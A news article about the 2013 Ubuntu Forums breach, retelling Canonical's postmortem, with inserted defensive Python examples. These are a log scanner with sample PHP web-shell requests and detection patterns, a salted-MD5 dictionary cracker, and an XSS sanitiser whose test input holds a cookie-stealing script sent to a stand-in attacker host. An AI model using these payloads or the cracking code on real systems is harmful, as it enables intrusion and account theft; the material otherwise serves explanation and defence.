
Ubuntu puts forums back online, reveals autopsy of a brag hacker

Canonical hardens security, shows Sputn1k_ only wolfed down useless salted hash


Ubuntu Forums are back to normal following a serious hack attack that exposed the usernames, email addresses and hashed passwords of 1.8 million open source users.

Parent firm Canonical restored the forums on Tuesday as well as publishing a detailed summary of what went wrong and the broad steps it has taken to beef up security.

Canonical blames the breach on a "combination of compromised individual accounts and the configuration settings in vBulletin, the Forums application software".

Only the forums were affected: neither the Ubuntu Linux distribution itself nor other Canonical and Ubuntu services such as Ubuntu One and Launchpad were touched. "We have repaired and hardened the Ubuntu Forums, and as the problematic settings are the default behaviour in vBulletin, we are working with vBulletin staff to change and/or better document these settings," a statement by Canonical on its official blog explains.

The blog post goes on to give a blow-by-blow account of how the high-profile hack was carried out:

At 16:58 UTC on 14 July 2013, the attacker was able to log in to a moderator account owned by a member of the Ubuntu Community.

This moderator account had permissions to post announcements to the Forums. Announcements in vBulletin, the Forums software, may be allowed to contain unfiltered HTML and do so by default.

The attacker posted an announcement and then sent private messages to three Forum administrators (also members of the Ubuntu community) claiming that there was a server error on the announcement page and asking the Forum administrators to take a look.

One of the Forum administrators quickly looked at the announcement page, saw nothing wrong and replied to the private message from the attacker saying so. 31 seconds after the Forum administrator looked at the announcement page (and before the administrator even had time to reply to the private message), the attacker logged in as that Forum administrator.

Based on the above and conversations with the vBulletin support staff, we believe the attacker added an XSS attack in the announcement they posted which sent the cookies of any visitor to the page to the attacker.

Once the attacker gained administrator access in the Forums they were able to add a hook through the administrator control panel. Hooks in vBulletin are arbitrary PHP code which can be made to run on every page load. The attacker installed a hook allowing them to execute arbitrary PHP passed in a query string argument. They used this mechanism to explore the environment and also to upload and install two widely available PHP shell kits. The attacker used these shell kits to upload and run some custom PHP code to dump the ‘user’ table to a file on disk which they then downloaded.

The attacker returned on 20 July to upload the defacement page.
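The postmortem above says the attacker's hook ran arbitrary PHP handed to it in a query-string argument, and that the same channel was used to fetch shell kits and dump the 'user' table. Requests like that leave a distinctive trace in ordinary web server access logs: PHP source where a forum expects thread and page numbers. What follows is an added example, not code from Canonical or vBulletin, of a scan for that trace over constructed log lines (the IPs, the `/index.php?x=` parameter name and the payloads are all made up for illustration; the page does not say which script or parameter the real hook used).

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Markers of PHP source being passed in a URL parameter, the way the postmortem
# describes the attacker's hook working. Assumption: the hook ran the raw
# parameter value as PHP, so no legitimate forum request should carry these.
PHP_MARKERS = re.compile(
    r"(<\?php|\b(?:eval|system|passthru|shell_exec|exec|assert|base64_decode|"
    r"file_put_contents|mysql_query|mysqli_query)\s*\(|\$_(?:GET|POST|REQUEST)\b|\bphp://)",
    re.IGNORECASE,
)

# Apache/nginx "combined" access log: ip ident user [time] "METHOD path HTTP/x" status ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')


def suspicious_params(url_path: str):
    """Return [(param, decoded value)] for query parameters that look like PHP code."""
    query = urlsplit(url_path).query
    hits = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        decoded = unquote_plus(value)  # second pass catches double-encoded payloads
        if PHP_MARKERS.search(decoded):
            hits.append((name, decoded))
    return hits


def scan_log(lines):
    """Return one finding per request whose query string carries PHP source."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        ip, ts, method, path, status = m.groups()
        hits = suspicious_params(path)
        if hits:
            findings.append({"ip": ip, "time": ts, "method": method, "path": path,
                             "status": int(status), "hits": hits})
    return findings


# Constructed sample lines (not the real Ubuntu Forums logs): two normal forum
# requests and two that smuggle PHP through the hypothetical "x" parameter.
SAMPLE_LOG = [
    '203.0.113.7 - - [14/Jul/2013:17:02:11 +0000] "GET /forumdisplay.php?f=12 HTTP/1.1" 200 9123 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [14/Jul/2013:17:05:40 +0000] "GET /index.php?x=%3C%3Fphp+system%28%27id%27%29%3B HTTP/1.1" 200 412 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [14/Jul/2013:17:06:02 +0000] "GET /showthread.php?t=2161789&page=2 HTTP/1.1" 200 15230 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [14/Jul/2013:17:09:55 +0000] "POST /index.php?x=eval(base64_decode($_POST[%27p%27])) HTTP/1.1" 200 38 "-" "curl/7.22.0"',
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding["time"], finding["ip"], finding["method"], finding["hits"])
```

The marker list is deliberately short and aimed at the pattern the postmortem describes; a real hunt would pair it with a diff of the vBulletin plugin/hook table against a known-good export, since a hook that reads its code from a POST body rather than the query string would not show up in the URL at all.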

Canonical's postmortem concludes that the hacker(s) would have had full access to the Forums database. That access was used to download the "user" table, which held usernames, email addresses and salted, MD5-hashed passwords for 1.82 million users. The salt rules out precomputed lookup tables, but MD5 is cheap to compute, so any weak or reused password in the dump can still be recovered by a dictionary attack; that is why the forced password change matters.
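To make the "salted MD5" point concrete, here is an added example (not Canonical's or vBulletin's code) that hashes a constructed user record the way vBulletin 3 and 4 did, md5(md5(password) + salt), runs a toy dictionary attack against it, and measures how many guesses per second a single Python thread manages against salted MD5 versus a deliberately slow KDF. The page only says "salted and hashed (using MD5)", so the exact md5(md5()) layout, the three-character salt and the wordlist are assumptions; the conclusion holds for any salted-MD5 variant.

```python
import hashlib
import time
from typing import Optional


def vb_hash(password: str, salt: str) -> str:
    """Assumed scheme: md5(md5(password) + salt), as used by vBulletin 3/4.
    The salt stops rainbow tables; it does nothing to slow a per-guess attack."""
    inner = hashlib.md5(password.encode("utf-8")).hexdigest()
    return hashlib.md5((inner + salt).encode("utf-8")).hexdigest()


def slow_hash(password: str, salt: str, iterations: int = 100_000) -> str:
    """What a forum should store instead: a tunable-cost KDF (PBKDF2-HMAC-SHA256 here)."""
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                               salt.encode("utf-8"), iterations).hex()


def crack(target: str, salt: str, wordlist) -> Optional[str]:
    """Offline dictionary attack on one leaked (hash, salt) pair; None if no candidate matches."""
    for candidate in wordlist:
        if vb_hash(candidate, salt) == target:
            return candidate
    return None


def rate(hash_fn, salt: str, n: int) -> float:
    """Guesses per second for hash_fn on this machine, single-threaded pure Python."""
    start = time.perf_counter()
    for i in range(n):
        hash_fn(f"candidate{i}", salt)
    return n / (time.perf_counter() - start)


# Constructed sample: one row shaped like a vBulletin user record, plus a toy wordlist.
# Nothing here comes from the breached table.
SAMPLE_SALT = "k7Q"
SAMPLE_HASH = vb_hash("ubuntu2013", SAMPLE_SALT)   # stands in for a leaked 'user' row
WORDLIST = ["password", "123456", "ubuntu", "linux", "ubuntu2013", "letmein"]

if __name__ == "__main__":
    print("recovered:", crack(SAMPLE_HASH, SAMPLE_SALT, WORDLIST))
    print(f"salted MD5:       {rate(vb_hash, SAMPLE_SALT, 50_000):,.0f} guesses/s")
    print(f"PBKDF2 (100k it): {rate(slow_hash, SAMPLE_SALT, 10):,.1f} guesses/s")
```

Even this unoptimised Python loop manages hundreds of thousands of salted-MD5 guesses per second, and GPU crackers manage billions; the KDF line shows the several-orders-of-magnitude gap that a slow hash buys the victims of a dump like this one.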

The audit also concludes that the hacker(s) were unable to reach any other Canonical or Ubuntu service; the Ubuntu code repositories and update mechanism were likewise beyond the attacker's reach.

The open-source firm admits it hasn't yet gotten to the bottom of how the attacker gained access to the moderator account used to start the attack or what type of cross-site scripting attack was subsequently brought into play. "The announcement the attacker posted was deleted by one of the Forum administrators so we don’t know exactly what XSS attack was used," it said.

The initial compromise went unnoticed and it wasn't until the Ubuntu Forums were defaced on Saturday 20 July that the site was pulled offline. A Twitter user using the profile @Sputn1k_ subsequently claimed responsibility for the defacement.

Sputn1k_ subsequently said he hadn't planned to crack the stolen ubuntuforums.org credentials, in a statement suggesting that pure devilment, and perhaps a desire to expose security flaws or gain bragging rights, lay behind the hack:

If I do get into a website, most of the time there's no REAL malicious intentions. Grab the database, leave a message. That's it. I don't like to over-do things. Might cause some downtime, but what if it WAS the "syr14n c3b3r 4rmy" (not that their brain-dead brains have the power to do anything whatsoever), and they did have malicious intentions, and they did leak the database and use it to their own advantage?

XSS (cross-site scripting) is a common class of web application vulnerability in which attacker-supplied markup or script is embedded in a page served by the vulnerable site and runs in the visitor's browser with that site's privileges. Because the script is treated as the site's own, it can read the site's cookies, act on behalf of the logged-in user or rewrite the page the user sees. It is a frequent ingredient of phishing and session-hijacking attacks, and the Ubuntu Forums hack graphically illustrates the latter: the postmortem's best guess is that a script in the announcement shipped the administrator's session cookie to the attacker, who then logged in with it.
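Two controls would have broken the chain the postmortem describes: not rendering unfiltered HTML in announcements (the vBulletin default Canonical blames), and marking the session cookie HttpOnly so that even a successful injection cannot read it from `document.cookie`. The following is an added example, not Canonical's or vBulletin's code, of both: an allow-list sanitiser for announcement markup, and a check that a `Set-Cookie` header carries the flags a session cookie needs. The tag list, the cookie name and the booby-trapped announcement are constructed for illustration; the real payload was deleted before Canonical saw it, so the sample is just the generic cookie-beacon pattern.

```python
from html import escape
from html.parser import HTMLParser

# Allow-list for announcement markup. Anything not listed is dropped, which is the
# opposite of the vBulletin default the postmortem blames (raw HTML rendered as-is).
ALLOWED_TAGS = {"p", "br", "b", "i", "em", "strong", "ul", "ol", "li", "a"}
ALLOWED_ATTRS = {"a": {"href"}}
SAFE_HREF_PREFIXES = ("http://", "https://", "/")
DROP_CONTENT_TAGS = {"script", "style"}  # their text must vanish, not be escaped


class AnnouncementSanitizer(HTMLParser):
    """Rebuild the markup from the allow-list; everything else becomes escaped text."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.dropping = 0  # nesting depth inside <script>/<style>

    def handle_starttag(self, tag, attrs):
        if tag in DROP_CONTENT_TAGS:
            self.dropping += 1
            return
        if self.dropping or tag not in ALLOWED_TAGS:
            return  # unknown tag (img, iframe, ...): drop the tag, keep any text
        kept = []
        for name, value in attrs:
            value = value or ""
            if name.lower().startswith("on"):  # onerror=, onload=, onmouseover=...
                continue
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue
            if name == "href" and not value.strip().lower().startswith(SAFE_HREF_PREFIXES):
                continue  # allow-listing schemes blocks javascript:, data:, vbscript:
            kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)  # <br/> -> <br>, without a bogus </br>

    def handle_endtag(self, tag):
        if tag in DROP_CONTENT_TAGS:
            self.dropping = max(0, self.dropping - 1)
        elif not self.dropping and tag in ALLOWED_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.dropping:
            self.out.append(escape(data))


def sanitize_announcement(html: str) -> str:
    """Return markup safe to embed in a page: allow-listed tags only, text escaped."""
    parser = AnnouncementSanitizer()
    parser.feed(html)
    parser.close()
    return "".join(parser.out)


def missing_cookie_flags(set_cookie_header: str) -> list:
    """Flags a session cookie should carry but does not. HttpOnly alone would have
    kept the administrator's session id out of reach of an injected script."""
    attrs = {part.strip().split("=", 1)[0].lower()
             for part in set_cookie_header.split(";")[1:]}
    return [flag for flag in ("HttpOnly", "Secure") if flag.lower() not in attrs]


# Constructed stand-in for a booby-trapped announcement (not the real payload).
EVIL_ANNOUNCEMENT = (
    '<p>Server error on this page, admins please check</p>'
    '<script>new Image().src="http://attacker.invalid/?c="+document.cookie</script>'
    '<img src=x onerror="alert(document.cookie)">'
    '<a href="javascript:alert(1)">details</a>'
)

if __name__ == "__main__":
    print(sanitize_announcement(EVIL_ANNOUNCEMENT))
    print(missing_cookie_flags("sessionhash=abc123; path=/"))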

Canonical's post goes on to provide a detailed description of steps it has taken to beef up its security and defend against future attacks.

The whole explanation is a model of openness and clarity that concludes with an apology about the data leak and downtime that came as a result of the breach.

Although users were inconvenienced by the breach - which left them without access to the forums for a week and obliged them to change their passwords - the restoration process was designed so that no data (posts, private messages etc) would be lost during the disaster recovery process. ®
